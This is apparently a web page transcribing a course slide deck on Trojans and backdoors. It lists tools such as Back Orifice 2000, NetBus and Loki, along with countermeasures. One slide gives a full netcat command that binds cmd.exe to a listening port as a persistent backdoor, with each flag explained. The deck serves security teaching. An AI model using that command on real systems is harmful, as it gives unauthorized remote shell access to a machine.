Week 6-1 Week 6: Trojans and Backdoors What is a Trojan Horse? Overt and Covert.

Slides:

Advertisements

Similar presentations

© 2003, Cisco Systems, Inc. All rights reserved..

Advertisements

Backdoors, Trojans and Rootkits CIS 413 This presentation is an amalgam of presentations by Mark Michael, Randy Marchany and Ed Skoudis. I have edited.

Backdoors A backdoor is a program that allows attackers to bypass normal security controls on a system, gaining access on the attacker’s own terms.

KULIAH III THREAT AND ATTACK (2) Aswin Suharsono KOM Keamanan Jaringan 2012/2013 KOM Keamanan Jaringan 2012/2013.

WARNING ! The system is either busy or has been unstable. You can wait and See if it becomes available again, or you can restart your computer. *

Trojans, Backdoors, Rootkits Viruses, and Worms

Operating and Configuring Cisco IOS Devices © 2004 Cisco Systems, Inc. All rights reserved. Operating Cisco IOS Software INTRO v2.0—8-1.

CAT TELECOM Security Awareness Training Rott Adsadawuttijaroen & Tanan Satayapiwat Trojans and Backdoors Module Objective Terms of reference for various.

ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.

Trojan Horse Program Presented by : Lori Agrawal.

Mike Ware 11/30/04 A Trojan Report and Analysis of BO2K, NetBus 1.7, and Sub7 Legends.

Backdoors and Remote Access Tools Roy INSA Laboratory.

11 ADMINISTERING MICROSOFT WINDOWS SERVER 2003 Chapter 2.

SMS Remote control Tool - Unleashed Oren Zippori Team Computers Israel System Management User Group.

Computer Security and Penetration Testing

Enumeration. Local IP addresses Local IP addresses (review)  Some special IP addresses  localhost (loopback address)  Internal networks 

Information Networking Security and Assurance Lab National Chung Cheng University Backdoors and Remote Access Tools INSA Laboratory.

Remote Desktop Security Raghav Chawla, Jon Ussery Group 20.

Terminal Server © N. Ganesan, Ph.D.. Reference Thin-Client Concept Thin-Client concept tutorial.

Installing Windows XP Professional Using Attended Installation Slide 1 of 41Session 2 Ver. 1.0 CompTIA A+ Certification: A Comprehensive Approach for all.

The Five Most Popular Attacks on the Internet Peter Mell, National Institute of Standards and Technology Computer Security Division.

TCP/IP Tools Lesson 5. Objectives Skills/ConceptsObjective Domain Description Objective Domain Number Using basic TCP/IP commands Understanding TCP/IP3.6.

11 SYSTEMS ADMINISTRATION AND TERMINAL SERVICES Chapter 12.

MIS Week 7 Site:

Chapter 11 Phase 5: Covering Tracks and Hiding. Attrition Web Site  Contains an archive of Web vandalism attacks

Defiana Arnaldy, M.Si

Network Security CPSC6128 – Lecture 4 Post Exploitation 1.

2440: 141 Web Site Administration Remote Web Server Access Tools Instructor: Enoch E. Damson.

Hacking Windows 2K, XP. Windows 2K, XP Review: NetBIOS name resolution. SMB - Shared Message Block - uses TCP port 139, and NBT - NetBIOS over TCP/IP.

Done By:Salha Mohammed Obaid AL-kaabi ID:

1 Backdoors and Trojans. ECE Internetwork Security 2 Agenda Overview Netcat Trojans/Backdoors.

Remote Control and Advanced Techniques. Remote Control Software What do they do? Connect through dial-in and/or TCP/IP. Replicate remote screen on local.

1 Web Server Administration Chapter 9 Extending the Web Environment.

Remote Desktop Services Remote Desktop Connection Remote Desktop Protocol Remote Assistance Remote Server Administration T0ols.

CIS 450 – Network Security Chapter 15 – Preserving Access.

COEN 350 Security Threats. Network Based Exploits Phases of an Attack  Reconnaissance  Scanning  Gaining Access  Expanding Access  Covering Tracks.

Copyright (C) 2000, Network Associates Technology Inc. Advanced Windows NT/2000 Security (II) Beyond The User Command Shell… Into The Trusted Computing.

Chapter 13 Understanding E-Security. 2 OBJECTIVES What are security concerns (examples)? What are two types of threats (client/server) Virus – Computer.

Remote Control & Backdoor Once administrative access has been gained hackers will maintain access through the backdoor remotely.

AE6382 Secure Shell Usually referred to as ssh, the name refers to both a program and a protocol. The program ssh is one of the most useful networking.

Hacker’s Strategies Revealed WEST CHESTER UNIVERSITY Computer Science Department Yuchen Zhou March 22, 2002.

System Hacking Active System Intrusion. Aspects of System Hacking System password guessing Password cracking Key loggers Eavesdropping Sniffers Man in.

MCTS Guide to Microsoft Windows Server 2008 Applications Infrastructure Configuration (Exam # ) Chapter Five Windows Server 2008 Remote Desktop Services,

Remote Administration Remote Desktop Remote Desktop Gateway Remote Assistance Windows Remote Management Service Remote Server Administration Tools.

Module 7: Managing Message Transport. Overview Introduction to Message Transport Implementing Message Transport.

Hacking Windows and Windows Security Lesson 10. Windows 9X/Me/NT There are still some folks out there using Windows 95 and 98, ME, 2000, and NT. Remote.

Securing New Technology Dominique Brezinski. Introduction We all have a few questions about Windows NT security: Is it really secure Should we be deploying.

Hacking Windows 9X/ME. Hacking framework Initial access physical access brute force trojans Privilege escalation Administrator, root privileges Consolidation.

Chapter 4 Hacking Windows Part 2. Authenticated Attacks Privilege Escalation Pilfering –Grabbing the Password Hashes –Cracking Passwords –LSADump –Previous.

CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Backdoors and Rootkits.

TCOM Information Assurance Management System Hacking.

XWN740 X-Windows Configuring and Using Remote Access (Chapter 13: Pages )‏

Rootkits, Backdoors, and Trojans ECE 4112 – Lab 5 Summary – Spring 2006 Group 9 Greg Sheridan Terry Harvey Group 10 Matthew Bowman Laura Silaghi Michael.

Trojans Daniel Bartsch CPSC 420 April 19,2007. What is a Trojan? Trojans are malware Named after Odysseus’s mythical trick Embedded in a program Cause.

Backdoor Programs Trisha Arocena. 2 types 1.Backdoor programs as administrative application tools 2. Backdoor programs as viruses.

CITA 310 Section 8 Extending the Web Environment (Textbook Chapter 9)

WebCCTV 1 Contents Introduction Getting Started Connecting the WebCCTV NVR to a local network Connecting the WebCCTV NVR to the Internet Restoring the.

CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Covert Channels.

© 2002, Cisco Systems, Inc. All rights reserved..

Mac OS X backdoor Trojan, now in beta? 報告人：劉旭哲. Introduction It targets users of Mac OS X As even the malware itself admits, it is not yet finished. It.

Chapter 7: Using Network Clients The Complete Guide To Linux System Administration.

Remote Control and Advanced Techniques Lesson 16.

Backdoors and Trojans.

Administration Tools Cluster.exe is a command line tool that you can use for scripting or remote administration through slow WAN links. Cluadmin.exe is.

Module Overview Installing and Configuring a Network Policy Server

Backdoor Attacks.

XWN740 X-Windows Configuring and Using Remote Access

Remote Control and Advanced Techniques

Implementing TMG Server Publishing

RAC Networking Lab.

Presentation transcript:

Week 6-1 Week 6: Trojans and Backdoors What is a Trojan Horse? Overt and Covert

Week 6-2 Week 6: Trojans and Backdoors Hacking Tool: QAZ Hacking Tool: Tini Hacking Tool: Netcat

Week 6-3 Netcat in Action as Backdoor Remote command prompt anyone? On a Windows NT server issue the following command in the directory that contains netcat: nc -l -p1234 -d -e cmd.exe –L This –l puts netcat into listen mode, the -p1234 tells netcat to use port 1234, the –d allows netcat to run detached from the console, the –e cmd.exe tells netcat to execute the cmd.exe program when a connection is made, and the –L will restart Netcat with the same command line when the connection is terminated. On the client system issue the following command: nc destination 1234 This command causes netcat to connect to the server named destination on port Immediately you are given a console connection to the destination server. Be careful! To exit the remote console session type: exit You will be returned to your own console and will be able to reconnect to the destination server because netcat was started on the destination server with the –L option.

Week 6-4 Week 6: Trojans and Backdoors Hacking Tool: Donald Dick Hacking Tool: SubSeven Hacking Tool: BackOrifice 2000 Back Oriffice Plug-ins

Week 6-5 Back Orifice 2000 Can be used as a Network Administrator to remotely configure its system. It can also be used as a Trojan/Backdoor by attackers. Can run on any filename, Uses TCP port and UDP by default but can use any other port. Can disguise itself as Explorer.exe. Can use Strong Encryption. Open Source. Countermeasure:BackOfficer Friendly (nfr.net/products/bof)

Week 6-6 Some BO2K Plugins BOPeep- provides streaming video of the victim’s screen to attacker. Encryption- Blowfish, CAST-256, IDEA, RC6 (stronger than most commercial systems) BOSOCK32- Stealth capabilities using ICMP STCPIO- stealth using encrypted flow between BO2K GUI and server.

Week 6-7 Week 6: Trojans and Backdoors Hacking Tool: NetBus Wrappers

Week 6-8 Week 6: Trojans and Backdoors Hacking Tool: Graffiti Hacking Tool: Silk Rope 2000 Hacking Tool: EliteWrap Hacking Tool: IconPlus

Week 6-9 Week 6: Trojans and Backdoors Packaging Tool: Microsoft WordPad Hacking Tool: Whack a Mole

Week 6-10 Week 6: Trojans and Backdoors Trojan Construction Kit BoSniffer Hacking Tool: FireKiller 2000

Week 6-11 Week 6: Trojans and Backdoors Covert Channels ICMP Tunneling Hacking Tool: Loki

Week 6-12 Week 6: Trojans and Backdoors Reverse WWW Shell Backdoor Countermeasures

Week 6-13 Week 6: Trojans and Backdoors BO Startup and Registry Entries NetBus Startup and Registry Keys

Week 6-14 Week 6: Trojans and Backdoors Port Monitoring Tools fPort (foundstone.com) TCPView ( tcpview.shtml) Process Viewer

Week 6-15 Week 6: Trojans and Backdoors Inzider - Tracks Processes and Ports ( ) Trojan Maker

Week 6-16 Week 6: Trojans and Backdoors Hacking Tool: Hard Disk Killer Man-in-the-Middle Attack Hacking Tool: dsniff

Week 6-17 Week 6: Trojans and Backdoors System File Verification TripWire (tripwire.com, tripwire.org)

Week 6-18 Week 6: Trojans and Backdoors Summary